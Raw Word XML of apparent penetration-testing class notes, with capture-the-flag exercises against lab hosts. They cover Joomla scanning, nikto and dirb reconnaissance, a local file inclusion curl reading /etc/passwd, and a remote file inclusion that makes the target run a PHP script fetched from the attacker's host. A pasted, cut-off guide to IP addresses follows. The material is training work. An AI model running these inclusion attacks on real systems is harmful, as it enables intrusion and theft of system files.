    <w:p w:rsidR="00AC422F" w:rsidRDefault="00AC422F" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;shell</w:t>
      </w:r>
      <w:r w:rsidR="00E407E2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    (see all directory)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00AC422F" w:rsidRDefault="00AC422F" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="007A4080" w:rsidRDefault="007A4080" w:rsidP="007A4080">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Exercises #3:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004F6192" w:rsidRDefault="004F6192" w:rsidP="004F6192">
      <w:pPr>
        <w:pStyle w:val="Default"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D31324">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Scan </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">10.10.10.4 </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="0008613F" w:rsidP="004F6192">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:t>E</w:t>
      </w:r>
      <w:r w:rsidR="004F6192">
        <w:t xml:space="preserve">xploit – how?   </w:t>
      </w:r>
      <w:r w:rsidR="002D20D2">
        <w:t xml:space="preserve">   - how to use joomscan to detect file inclusion, sql injection, command execution vulnerability of a target joomla! Website </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00394660" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;joomscan</w:t>
      </w:r>
      <w:r w:rsidR="001A4179">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> –u    </w:t>
      </w:r>
      <w:hyperlink r:id="rId13" w:history="1">
        <w:r w:rsidR="00AC422F" w:rsidRPr="0038324D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://10.10.10.4</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00AC422F" w:rsidRDefault="00AC422F" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Msf&gt;search type:exploit joomla       (got results there are 6 potential exploits)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="00330270" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009F15C3" w:rsidRDefault="00142C26" w:rsidP="008E5CF2">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Exercises #4a:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078571B" w:rsidRDefault="0026699C" w:rsidP="0078571B">
      <w:hyperlink r:id="rId14" w:history="1">
        <w:r w:rsidR="0078571B" w:rsidRPr="0038324D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>www.ctf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0078571B" w:rsidRDefault="0078571B" w:rsidP="0078571B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Use various reconnanceance commands – document findings (nikto, nmap dirb others)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078571B" w:rsidRDefault="0078571B" w:rsidP="0078571B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t>Research what is “RFI”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078571B" w:rsidRDefault="0078571B" w:rsidP="0078571B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Use “Curl” to get contents of /etc/password </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401E4C" w:rsidRDefault="00401E4C" w:rsidP="00401E4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>Hints:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00401E4C" w:rsidRDefault="00401E4C" w:rsidP="00401E4C">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve"> - manipulate the “Lang” parameter (in PHP script or html)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078571B" w:rsidRPr="0078571B" w:rsidRDefault="00401E4C" w:rsidP="00336086">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
      </w:pPr>
      <w:r>
        <w:t>- but on what page?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F15C3" w:rsidRDefault="009F15C3" w:rsidP="009F15C3">
      <w:r w:rsidRPr="008419AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>RFI</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> – remote file inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009F15C3" w:rsidRPr="009F15C3" w:rsidRDefault="006A46FA" w:rsidP="009F15C3">
      <w:r w:rsidRPr="008419AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>L</w:t>
      </w:r>
      <w:r w:rsidR="009F15C3" w:rsidRPr="008419AD">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>FI</w:t>
      </w:r>
      <w:r w:rsidR="009F15C3">
        <w:t xml:space="preserve"> – local file inclusion</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00330270" w:rsidRDefault="009F15C3" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;nikto –host   10.10.10.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E5CF2" w:rsidRDefault="008E5CF2" w:rsidP="008E5CF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">&gt;dirb      </w:t>
      </w:r>
      <w:hyperlink r:id="rId15" w:history="1">
        <w:r w:rsidR="0078571B" w:rsidRPr="0038324D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://10.10.10.5</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="0078571B" w:rsidRPr="001D1C16" w:rsidRDefault="0078571B" w:rsidP="0078571B">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;curl –host   10.10.10.5</w:t>
      </w:r>
      <w:r w:rsidR="006C59BF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">    (Curl – to download file, view the file contents e.g. PHP script file)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0078571B" w:rsidRDefault="00D3388C" w:rsidP="008E5CF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>&gt;curl   http://www.ctf/translate/index.php?lang=/etc/password/</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D3388C" w:rsidRDefault="00D3388C" w:rsidP="008E5CF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D3388C" w:rsidRPr="001D1C16" w:rsidRDefault="00D3388C" w:rsidP="008E5CF2">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="006C59BF" w:rsidRDefault="006C59BF" w:rsidP="006C59BF">
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
      </w:pPr>
      <w:r>
        <w:t>Exercises #4b:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="006C59BF" w:rsidRDefault="00D37DD5" w:rsidP="006C59BF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>10.10.10.5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D37DD5" w:rsidRDefault="00172F14" w:rsidP="006C59BF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>1. O</w:t>
      </w:r>
      <w:r w:rsidR="00D37DD5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>n your local machine – create a “command.txt” – php script that execute “&lt; php echo ‘ls’;”</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00172F14" w:rsidRDefault="00172F14" w:rsidP="006C59BF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2. Start local webserver</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00172F14" w:rsidRDefault="00172F14" w:rsidP="006C59BF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">3. Use RFI to execute this script on </w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:history="1">
        <w:r w:rsidRPr="0038324D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>www.ctf</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00E2747E" w:rsidRDefault="00172F14" w:rsidP="006C59BF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>4. keep the screenshot</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00172F14" w:rsidRDefault="00E2747E" w:rsidP="006C59BF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">5. find the flag $ ”capture” </w:t>
      </w:r>
      <w:r w:rsidR="00172F14">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>it, (flg file copy the content and submit it)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00172F14" w:rsidRPr="000E2A1F" w:rsidRDefault="000E2A1F" w:rsidP="006C59BF">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="000E2A1F">
        <w:rPr>
          <w:b/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>RFI</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E5CF2" w:rsidRDefault="00BB6AC6" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">&gt;curl   </w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:history="1">
        <w:r w:rsidRPr="0038324D">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:t>http://www.ctf/translate/index.php?lang=http://10.10.10.163/command.txt</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w:rsidR="00BB6AC6" w:rsidRDefault="00BB6AC6" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(after execute above command line the PHP file content will be displayed)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00D60B8C" w:rsidRDefault="00D60B8C" w:rsidP="001D1C16">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00F643F9">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:after="0" w:line="312" w:lineRule="atLeast"/>
        <w:outlineLvl w:val="0"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C1F4E"/>
          <w:kern w:val="36"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="1C1F4E"/>
          <w:kern w:val="36"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>What is an IP address? What does 192.168.0.1 mean?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00386EB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>You’ve probably heard mention of these things called IP addresses. But what are they? And how do they work?</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386EB9" w:rsidRPr="00F643F9" w:rsidRDefault="00386EB9" w:rsidP="00386EB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00386EB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Have you ever wondered what an IP address is or what 192.168.0.1 refers to? It's impossible to avoid maths when talking about IPs, so this is slightly longer and more complex than the other uSwitch guides.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386EB9" w:rsidRPr="00F643F9" w:rsidRDefault="00386EB9" w:rsidP="00386EB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00386EB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>But weather the storm because we think you'll find it very helpful. Aside from the fact that everyone should know a little about how stuff like this works, it's handy to be able to spot basic connection problems and understand technicians when they use jargon.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386EB9" w:rsidRPr="00F643F9" w:rsidRDefault="00386EB9" w:rsidP="00386EB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00386EB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Basically, the people who were playing around with the early internet needed a way of identifying computer systems when they connected together, similar to a phone number: If you dial the same number, you always get the same computer.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386EB9" w:rsidRPr="00F643F9" w:rsidRDefault="00386EB9" w:rsidP="00386EB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00386EB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00F643F9">
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IP addresses were born, and like a phone number or address, they contain bits of information about your location.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00386EB9" w:rsidRPr="00F643F9" w:rsidRDefault="00386EB9" w:rsidP="00386EB9">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:eastAsia="Times New Roman" w:cs="Segoe UI"/>
          <w:color w:val="2F353A"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00F643F9" w:rsidRPr="00F643F9" w:rsidRDefault="00F643F9" w:rsidP="00386EB9">
      <w:pPr>
